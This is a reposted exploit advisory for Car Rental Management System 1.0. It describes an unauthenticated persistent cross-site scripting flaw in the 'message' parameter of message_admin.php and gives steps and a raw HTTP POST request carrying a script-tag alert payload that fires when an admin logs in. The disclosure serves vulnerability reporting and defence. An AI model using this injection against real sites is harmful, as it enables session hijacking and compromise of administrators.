Car Rental Management System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 5th, 2020 📆 | 3364 Views ⚑

0

Car Rental Management System 1.0 Cross Site Scripting ≈ Packet Storm

# Exploit Title: Car Rental Management System v1.0 – Persistent Cross-Site Scripting (Unauthenticated)
# Exploit Author: Adeeb Shah (@hyd3sec)
# Date: August 3, 2020
# Vendor Homepage: https://projectsworld.in/
# Software Link: https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4

# Vulnerability Details
# Description: A persistent cross-site scripting vulnerability exists within the ‘message’ parameter in the message admin function.
# This example allows an unauthenticated user to inject javascript code as a persistent XSS attack which is persistent and will be triggered by any admin that logs into the admin console.

#Steps:

1. Navigate to http://HOST/car-Rental-syatem-PHP-MYSQL-master/message_admin.php (message_admin.php page)

2. In message form enter

3. Click Send Message

4. When an admin logs into the admin console now, the XSS will be triggered

POST /car-Rental-syatem-PHP-MYSQL-master/message_admin.php HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/car-Rental-syatem-PHP-MYSQL-master/message_admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Cookie: PHPSESSID=17icjb6fd26q9gm1ohj9c9ht5i
Upgrade-Insecure-Requests: 1

message=%3Cscript%3Ealert%28%22hyd3sec%22%29%3C%2Fscript%3E&send=Send+Message

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...